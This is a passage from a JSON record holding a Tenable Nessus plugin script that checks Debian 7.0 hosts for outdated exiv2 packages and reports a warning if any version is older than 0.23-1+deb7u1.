value:\"https://packages.debian.org/source/wheezy/exiv2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exiv2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libexiv2-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libexiv2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libexiv2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libexiv2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exiv2\", reference:\"0.23-1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libexiv2-12\", reference:\"0.23-1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libexiv2-dbg\", reference:\"0.23-1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libexiv2-dev\", reference:\"0.23-1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libexiv2-doc\", reference:\"0.23-1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}